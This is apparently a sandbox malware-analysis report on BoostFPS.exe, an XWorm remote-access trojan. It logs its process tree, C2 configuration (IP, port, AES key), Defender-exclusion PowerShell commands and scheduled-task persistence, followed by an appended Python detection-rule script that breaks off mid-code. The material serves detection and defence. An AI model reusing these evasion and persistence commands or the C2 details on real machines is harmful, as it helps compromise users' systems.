Windows Analysis Report
BoostFPS.exe

Overview

General Information

Sample name: BoostFPS.exe
Analysis ID: 1559236
MD5: 20f5290def51514fefaed2b744ed961c
SHA1: 546f5c611c1d35c5104e2792c76934746f637987
SHA256: 3e6f0de70c94df15b3aecb8ce4370e26b62fa38a24bf3710d0d9f0a28b4da656
Tags: exe, user-Slimzick

Detection

XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BoostFPS.exe (PID: 5252 cmdline: "C:\Users\user\Desktop\BoostFPS.exe" MD5: 20F5290DEF51514FEFAED2B744ED961C)
    • cmd.exe (PID: 3176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 5332 cmdline: Mode 100,25 MD5: BEA7464830980BF7C0490307DB4FC875)
      • chcp.com (PID: 6672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • svchost.exe (PID: 7160 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
      • powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3116 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6968 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 4748 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • cleanup
{"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara Overview

Dropped Files
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xe785:$s6: VirtualBox
  • 0xe6e3:$s8: Win32_ComputerSystem
  • 0x112a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11344:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11459:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10309:$cnc4: POST / HTTP/1.1

Memory Dumps
Source | Rule | Description | Author
00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xe585:$s6: VirtualBox
  • 0xe4e3:$s8: Win32_ComputerSystem
  • 0x110a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11144:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11259:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10109:$cnc4: POST / HTTP/1.1
00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x39f85:$s6: VirtualBox
  • 0x4d3c5:$s6: VirtualBox
  • 0x39ee3:$s8: Win32_ComputerSystem
  • 0x4d323:$s8: Win32_ComputerSystem
  • 0x3caa7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x4fee7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x3cb44:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x4ff84:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x3cc59:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x50099:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x3bb09:$cnc4: POST / HTTP/1.1
  • 0x4ef49:$cnc4: POST / HTTP/1.1
3 further memory-dump entries are not shown in this extract.

Unpacked PEs
Source | Rule | Description | Author
0.2.BoostFPS.exe.250c800.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.0.svchost.exe.1a0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.0.svchost.exe.1a0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.2.BoostFPS.exe.250c800.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xc985:$s6: VirtualBox
  • 0xc8e3:$s8: Win32_ComputerSystem
  • 0xf4a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf544:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf659:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe509:$cnc4: POST / HTTP/1.1
4.0.svchost.exe.1a0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xe785:$s6: VirtualBox
  • 0xe6e3:$s8: Win32_ComputerSystem
  • 0x112a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11344:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11459:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10309:$cnc4: POST / HTTP/1.1
8 further unpacked-PE entries are not shown in this extract.

Note that the MALWARE_Win_AsyncRAT hits rest on strings that are not specific to AsyncRAT (a VirtualBox check, a Win32_ComputerSystem WMI query, three browser User-Agent strings and a "POST / HTTP/1.1" request line); the family verdict here comes from the JoeSecurity_XWorm rule together with the extracted configuration, not from that rule.

                  System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\BoostFPS.exe, ProcessId: 5252, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 45.141.27.248, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\AppData\Roaming\svchost.exe, Initiated: true, ProcessId: 7160, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49979
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 6968, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 7160, ProcessName: svchost.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 7160, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 7160, ProcessName: svchost.exe

                  Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe
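The System Summary and Persistence entries above are the raw Sigma hits for one chain of host events: BoostFPS.exe drops a file named svchost.exe into %AppData%, that copy spawns PowerShell with -ExecutionPolicy Bypass to add Defender exclusions for itself, registers a scheduled task that reruns it every minute with the highest run level, writes a Run key and drops a .lnk in the Startup folder. The following triage script is an added example and not part of the Joe Sandbox report: its event records are constructed by hand from the process tree and the Sigma data above (PIDs, paths and command lines copied from the report; the System32 svchost.exe record is an invented control case), and its rule functions are a simplified re-implementation of what the listed Sigma titles check, not the Sigma rules themselves. The allow-lists (expected svchost.exe parents, user-writable path fragments) are assumptions.

```python
"""Host-telemetry triage rules for the behaviour shown in this report.

Added example, not part of the Joe Sandbox report. EVENTS is constructed by
hand from the report's process tree and Sigma hits; the pid-1234 record is an
invented benign control. Rules approximate the Sigma titles listed in the
report; allow-lists below are assumptions, not Sigma's exact lists.
"""
import ntpath
import re
from collections import defaultdict

DROP = r"C:\Users\user\AppData\Roaming\svchost.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"

EVENTS = [
    {"type": "process", "pid": 5252, "image": r"C:\Users\user\Desktop\BoostFPS.exe",
     "cmdline": r'"C:\Users\user\Desktop\BoostFPS.exe"', "parent_image": ""},
    {"type": "file", "pid": 5252, "image": r"C:\Users\user\Desktop\BoostFPS.exe", "target": DROP},
    {"type": "process", "pid": 7160, "image": DROP, "cmdline": f'"{DROP}"',
     "parent_image": r"C:\Users\user\Desktop\BoostFPS.exe"},
    {"type": "process", "pid": 4164, "image": PS, "parent_image": DROP,
     "cmdline": f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{DROP}'"},
    {"type": "process", "pid": 3364, "image": PS, "parent_image": DROP,
     "cmdline": f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'"},
    {"type": "process", "pid": 3116, "image": SCHTASKS, "parent_image": DROP,
     "cmdline": f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "{DROP}"'},
    {"type": "registry", "pid": 7160, "image": DROP,
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost", "value": DROP},
    {"type": "file", "pid": 7160, "image": DROP,
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk"},
    # Constructed control case: the genuine service host must not fire any rule.
    {"type": "process", "pid": 1234, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "parent_image": r"C:\Windows\System32\services.exe"},
]

# Assumptions: names Windows keeps under System32/SysWOW64, the parents that
# legitimately start svchost.exe, and path fragments an unprivileged user can write to.
SYSTEM_PROCESS_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def _base(path): return ntpath.basename(path or "").lower()
def _dir(path): return ntpath.dirname(path or "").lower()
def _cmd(ev): return (ev.get("cmdline") or "").lower()
def _user_writable(path): return any(tok in (path or "").lower() for tok in USER_WRITABLE)


def system_process_name_outside_system_dirs(ev):
    # Sigma: "Files With System Process Name In Unsuspected Locations" / "System File Execution Location Anomaly"
    path = ev.get("image") if ev["type"] == "process" else ev.get("target")
    return ev["type"] in ("process", "file") and _base(path) in SYSTEM_PROCESS_NAMES and _dir(path) not in SYSTEM_DIRS


def uncommon_svchost_parent(ev):
    return (ev["type"] == "process" and _base(ev["image"]) == "svchost.exe"
            and _base(ev.get("parent_image")) not in EXPECTED_SVCHOST_PARENTS)


def powershell_defender_exclusion(ev):
    c = _cmd(ev)
    return (ev["type"] == "process" and _base(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and "add-mppreference" in c
            and re.search(r"-exclusion(path|process|extension|ipaddress)", c) is not None)


def insecure_execution_policy(ev):
    return (ev["type"] == "process" and _base(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and re.search(r"-(executionpolicy|exec|ep)\s+(bypass|unrestricted)", _cmd(ev)) is not None)


def scheduled_task_to_user_writable_path(ev):
    c = _cmd(ev)
    if not (ev["type"] == "process" and _base(ev["image"]) == "schtasks.exe" and "/create" in c):
        return False
    m = re.search(r'/tr\s+"?([^"]+)', c)  # the /tr argument is the program the task runs
    return bool(m) and _user_writable(m.group(1)) and ("/rl highest" in c or "/sc minute" in c)


def run_key_to_user_writable_path(ev):
    return (ev["type"] == "registry" and "\\currentversion\\run\\" in ev["key"].lower()
            and _user_writable(ev["value"]))


def startup_folder_write(ev):
    return ev["type"] == "file" and "\\start menu\\programs\\startup\\" in ev["target"].lower()


RULES = {fn.__name__: fn for fn in (
    system_process_name_outside_system_dirs, uncommon_svchost_parent, powershell_defender_exclusion,
    insecure_execution_policy, scheduled_task_to_user_writable_path, run_key_to_user_writable_path,
    startup_folder_write)}


def triage(events):
    """Return {pid: [rule names]} for every pid with at least one matching event."""
    hits = defaultdict(list)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev) and name not in hits[ev["pid"]]:
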